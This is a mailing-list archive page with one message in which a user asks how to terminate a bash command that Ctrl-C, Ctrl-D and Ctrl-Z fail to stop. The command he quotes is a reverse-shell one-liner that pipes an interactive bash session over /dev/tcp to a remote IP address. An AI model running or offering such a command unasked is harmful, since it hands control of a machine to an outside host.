[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
How to terminate bash -i?
From: |
Peng Yu |
Subject: |
How to terminate bash -i? |
Date: |
Wed, 30 Dec 2020 22:03:14 -0600 |
Hi,
bash -i >& /dev/tcp/192.168.1.190/80 0>&1
I run the above command in a bash interactive session. Is there a way
to terminate this command and get back to the original session? I
tried ctrl-C, ctrl-D and ctrl-Z. None of them can terminate this
command. Thanks.
--
Regards,
Peng
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- How to terminate bash -i?,
Peng Yu <=